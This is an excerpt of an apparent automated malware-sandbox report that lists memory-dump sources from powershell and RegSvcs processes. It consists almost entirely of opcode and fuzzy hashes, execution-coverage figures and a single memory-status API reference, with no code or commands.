                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction ID: c87ae5a9f8020a07a5664d9d9a682ad38aad8f0a55f0b56f7197af45680d94c5
                                        • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                        • Instruction Fuzzy Hash: B201A77011CB0C4FD744EF0CE051AA6B3E0FB85364F10052DE58AC3651D636E882CB46
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d81c499e1abc22664dd240f541a7602a98e4c1e1b626bb4d17753bea989df087
                                        • Instruction ID: 17a88a9d13f64f7de55a8d6409e954c07e9f3eb75d5f136f621fdf2c1876b05f
                                        • Opcode Fuzzy Hash: d81c499e1abc22664dd240f541a7602a98e4c1e1b626bb4d17753bea989df087
                                        • Instruction Fuzzy Hash: 07F0AF3184868D9FDB49EB64D4A9AED7FF0FF55300F4541EAD00ACB0A2DB39A949CB41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37f0d8e619612d21874640dba971525420bf9359abbec3e5f98f24328e4e41d7
                                        • Instruction ID: 5760f93cb5313c4bedcc1ec627c1f36071c38c4260c53088fabdee91a6d4fc29
                                        • Opcode Fuzzy Hash: 37f0d8e619612d21874640dba971525420bf9359abbec3e5f98f24328e4e41d7
                                        • Instruction Fuzzy Hash: EEE0EC309085594FD791EB6498557A9B6F1BF58201F0044FA944ED7292DE742DC5CB01
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                        • Instruction ID: 2cf2181c1e1aa20770b3168e0806892b2844d78ad13680c24fb2a8562047a8a1
                                        • Opcode Fuzzy Hash: aabcfd91e8f55191a004931a183e6dcb2518b9a1ea28bfbd136d216059383d0f
                                        • Instruction Fuzzy Hash: 68D05E309592098FCB4CEF50C2624BD7772BF48744B20007ED40BAB281CB355902CB20
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1512455707.00007FF887A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A50000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff887a50000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (0#$8,#$P/#$p0#$-#$/#
                                        • API String ID: 0-2162826562
                                        • Opcode ID: cd4087cd0e1e673d80b68f0cefdf08c0db9c7867198c942ddd94108b21b21fa5
                                        • Instruction ID: 0fdb71bd53bce7a25e5350a7eb138443a59c35d5a8a767dc30068886d1a036a4
                                        • Opcode Fuzzy Hash: cd4087cd0e1e673d80b68f0cefdf08c0db9c7867198c942ddd94108b21b21fa5
                                        • Instruction Fuzzy Hash: A331A352D4E6C68FE7178AB868A703E7F72BF12690B1D84FBC0988B0D7D4498D09C342

                                        Execution Graph

                                        Execution Coverage:14.7%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:46
                                        Total number of Limit Nodes:6
                                        execution_graph: call graph rooted at 15e18e0, reaching 15e7b7c, 15e8300 and 15e8346, which call GlobalMemoryStatusEx (figure; node/edge listing not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d18b337d2ad887342859b8b91f8634c5b0ac8e0b1fc5b69583702cdaadc223e9
                                        • Instruction ID: 397d3aa18f5dc4f4801435d1c9742a11c1d4270e987a3122c48e2e19c77b3fb1
                                        • Opcode Fuzzy Hash: d18b337d2ad887342859b8b91f8634c5b0ac8e0b1fc5b69583702cdaadc223e9
                                        • Instruction Fuzzy Hash: 54726A70E002199FDB19CFA9C898AAEBBF6BF88301F148469E555EB361DB31DD41CB50
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2cd5e4716ad3c15fb5fd153888fbdb1f4ca655072caf4e3d8c899f74ba539e9e
                                        • Instruction ID: 108f8062f6050c368ee1be24bf340a4b974a638856195d52f4f40c4dd1ae7cd0
                                        • Opcode Fuzzy Hash: 2cd5e4716ad3c15fb5fd153888fbdb1f4ca655072caf4e3d8c899f74ba539e9e
                                        • Instruction Fuzzy Hash: B3823974A00209DFDB19CF68C988AAEBBF2BF88310F158559E5569F3A1D730ED41CB91

                                        Control-flow Graph

                                        control_flow_graph: basic-block graph of the function at 15e8618 (blocks 15e8618-15e8a86; figure with executed/not-executed colouring, node/edge listing not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eeb80ee71921c4a7f653193a50032f74e54a20f907bf2730f3e4688bc7cb2fa1
                                        • Instruction ID: 2dfdda96a75c908cbddad114f7af58f9c306e257be853a2a5e2e9d6509b382da
                                        • Opcode Fuzzy Hash: eeb80ee71921c4a7f653193a50032f74e54a20f907bf2730f3e4688bc7cb2fa1
                                        • Instruction Fuzzy Hash: C4C18530E04219CBEF2C5FEA94183AD7BF2BFC8751F198819D442FA284DB748841DB65

                                        Control-flow Graph

                                        control_flow_graph: basic-block graph of the function at 15e5bc8 (blocks 15e5bc8-15e5f48, with calls to 15e1f34; figure with executed/not-executed colouring, node/edge listing not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 544ba69ac2b03bbd4b16658e3441d38a30d888c652949a65e1972f42957f4419
                                        • Instruction ID: 6ed04c14abdd632d375b24533da30c373033fedbdd963f5ad98b7adc976527be
                                        • Opcode Fuzzy Hash: 544ba69ac2b03bbd4b16658e3441d38a30d888c652949a65e1972f42957f4419
                                        • Instruction Fuzzy Hash: 44B18F74E10209CFDB18CFA9C88979EBBF2BF88318F148129D415EB254EB759946CB81

                                        Control-flow Graph

                                        control_flow_graph: basic-block graph of the function at 15e6498 (blocks 15e6498-15e67e6, with calls to 15e1f34; figure with executed/not-executed colouring, node/edge listing not reproduced)
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0cc3bc9177cc3298ae0f8db39d2702a710041901b87b8bd5fdc9046f216bcd03
                                        • Instruction ID: 2e4fdc9861533d896cf520cc0e1694efa5b443a2a19ca28e42f87c13179a6227
                                        • Opcode Fuzzy Hash: 0cc3bc9177cc3298ae0f8db39d2702a710041901b87b8bd5fdc9046f216bcd03
                                        • Instruction Fuzzy Hash: 4EB17C70E102098FDB18CFA9C88979EBBF2BF98354F148529D815EB294EB749845CB81

                                        Control-flow Graph

                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c4f111fcf274d918092cc63b5010f13c3c326721dd7755e4a1151b18c54e26dc
                                        • Instruction ID: 97e33fafeff5e679ae2dbcd978b3ae8282c2d1877b15b913a437cdb308bed916
                                        • Opcode Fuzzy Hash: c4f111fcf274d918092cc63b5010f13c3c326721dd7755e4a1151b18c54e26dc
                                        • Instruction Fuzzy Hash: A5411432E047868FDB15DFB9D8043EEBBF5FF89210F15866AC444AB251EB789845CB90

                                        Control-flow Graph

                                        control_flow_graph: 15e7b7c-15e8374 calls GlobalMemoryStatusEx, then branches to 15e8376-15e837c or 15e837d-15e83a5 (figure with executed/not-executed colouring, node/edge listing not reproduced)
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015E827A), ref: 015E8367
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 86c60337bbb4c4d41486aaab9a29e13f89055de3e0b1672c14831f2c112028ea
                                        • Instruction ID: a8132894b784befb0ce4b485a8d339b41cfcc203751429d85ab95d5855bfd81d
                                        • Opcode Fuzzy Hash: 86c60337bbb4c4d41486aaab9a29e13f89055de3e0b1672c14831f2c112028ea
                                        • Instruction Fuzzy Hash: 0E1133B1C006599BDB10CF9AC844B9EFBF4BF48220F11816AD818AB240D378A940CFE1

                                        Control-flow Graph

                                        control_flow_graph: 15e82f8-15e833e, then 15e8346-15e8374 calls GlobalMemoryStatusEx and branches to 15e8376-15e837c or 15e837d-15e83a5 (figure with executed/not-executed colouring, node/edge listing not reproduced)
                                        APIs
                                        • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,015E827A), ref: 015E8367
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID:
                                        • API String ID: 1890195054-0
                                        • Opcode ID: 3518d784e08d842cc9bec7c6bb5c75997744ba41c0a6f5412bcd64fb1cffa5ed
                                        • Instruction ID: c0ed253a6c822d57097c10071c3f82cbb15a539cf5d7119c3a74b53c27fd9a11
                                        • Opcode Fuzzy Hash: 3518d784e08d842cc9bec7c6bb5c75997744ba41c0a6f5412bcd64fb1cffa5ed
                                        • Instruction Fuzzy Hash: A91126B6C00659DFDB10CFAAC5457DEFBF4BF08220F15856AD858AB240D378AA44CFA1
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7c755fae98118ef718cb6572ee1a1a43af758cd5ddbe97cff283c5f39e0492d8
                                        • Instruction ID: fd261e3666d04a7975ad94d13b8e7f5c006b967c7268979aa9ee65a7881677c8
                                        • Opcode Fuzzy Hash: 7c755fae98118ef718cb6572ee1a1a43af758cd5ddbe97cff283c5f39e0492d8
                                        • Instruction Fuzzy Hash: C6819274F002199BDB1CDFB5889837E77F7BFC8610B058969E456EB388CE3498059B92
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3915975794.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_15e0000_RegSvcs.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 786722e423d524068726b33018f5175dd924e2599999181f08a1312c8115271c
                                        • Instruction ID: 07d36d8f765a8ef4334b79954a556fb00c9682101a7459e8d1b23692ff51a660
                                        • Opcode Fuzzy Hash: 786722e423d524068726b33018f5175dd924e2599999181f08a1312c8115271c
                                        • Instruction Fuzzy Hash: 3D913974E103098FDF18CFA9C9897EEBBF2BF88318F148529D415AB254EB749845CB91